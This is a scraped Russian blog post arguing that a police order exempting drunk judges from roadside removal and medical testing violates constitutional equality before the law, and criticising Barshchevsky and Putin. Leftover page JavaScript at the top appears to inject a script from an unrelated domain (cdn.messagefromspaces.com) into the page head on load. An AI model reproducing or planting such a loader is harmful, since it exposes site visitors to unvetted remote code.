, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

К чему приводят рассуждения дилетантов о «независимом судье»?

11 Фев

СМИ сообщают о том, что вступил в силу приказ МВД России, согласно которому сотрудники ГИБДД больше не имеют права отстранять от управления автомобилем нетрезвых судей и направлять их на медицинское освидетельствование.

А как же  быть с волей единственного источника власти в стране, многонационального народа, что материализована в Конституции России?

В статье 19 Конституции утверждается:

1. Все равны перед законом и судом.

2. Государство гарантирует равенство прав и свобод человека и гражданина независимо от пола, расы, национальности, языка, происхождения, имущественного и должностного положения, места жительства, отношения к религии, убеждений, принадлежности к общественным объединениям, а также других обстоятельств. Запрещаются любые формы ограничения прав граждан по признакам социальной, расовой, национальной, языковой или религиозной.

Получается, что такие должностные лица, как судьи, вправе управлять автомобилем в нетрезвом состоянии, а другие должностные лица, например, сотрудники органов внутренних дел, такой привилегии лишены.

А разве названные лица не должны быть служителями Закона, как и судьи?

Статья 15 Конституции России утверждает, что органы государственной власти, органы местного самоуправления, должностные лица, граждане и их объединения обязаны соблюдать Конституцию Российской Федерации и законы.

И вот тут, нас пытаются просветить. Так, полномочный представитель правительства РФ в высших судебных инстанциях Михаил Барщевский говорит: https://www.novayagazeta.ru/articles/2018/02/10/75462-schastlivogo-tormoznogo-puti  «Если мы хотим иметь независимое правосудие, мы должны сделать так, чтобы судья был огражден законом от любых возможных злоупотреблений».

Получается, что исполнение своих обязанностей  сотрудниками ГИБДД по отстранению от управления автомобилем нетрезвых судей и направление их на медицинское освидетельствование, есть злоупотребление?

В своё время, М. Барщевский публично заявлял: «Я, человек, не знающий уголовного процесса» http://www.echo.msk.ru/programs/personalno/1498814-echo/

Понятно, на каком уровне может рассуждать о «независимом суде»  человек, не знающий уголовного процесса. Но юрист обязан всюду разъяснять, что судья, при любых навалившихся на него «зависимостях»,  обязан повиноваться Конституции России, беспрекословно её слушаться, быть всегда в зависимости от требований Конституции и порядка судопроизводства. Неужели в России уже не осталось таких юристов?

Уже не только ведомственными приказами пытались создать из некоторых должностных лиц, привилегированное сословие, но и на законодательном уровне.

Так, попытка выделить из числа мошенников особых мошенников, имеющих статус предпринимателя, закончилась всемирным позором и для законодателей и гаранта Конституции В. Путина.

По инициативе Уполномоченного при Президенте России по защите прав предпринимателей Бориса Титова были приняты законы, которые ставили предпринимателей-мошенников в привилегированное положение по отношению к другим мошенникам.

Конституционный Суд РФ  признал ст. 159.4 УК РФ противоречащей Конституции.

Эта норма предоставляет поблажки предпринимателям, выделяя их в привилегированное сословие, и нарушает принципа равенства всех перед законом. http://top.rbc.ru/politics/11/12/2014/548987972ae596e2fa56fc79

Возможно, найдутся разумные люди и признают ведомственный приказ противоречащим Основному Закону страны. Но ощущение безысходности накануне предстоящих выборов не покидает.

В МВД есть специальное правовое управление, которое обязано отслеживать правовую деятельность ведомства, добиваясь издания приказов, распоряжений и инструкций, которые не противоречили бы Конституции России.

У гаранта Конституции В. Путина есть огромный штат помощников, которые обязаны отслеживать жизнь страны по правилам, что изложены в Конституции России.

Если  такие приказы издаются, зачем стране столь затратные «правовые управления» и помощники президента?

Зачем В. Путин желает быть гарантом Конституции в четвёртый раз, если за 18 лет управления страной так и не смог установить власть Конституции России, обеспеченную её гарантом и правосудием?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.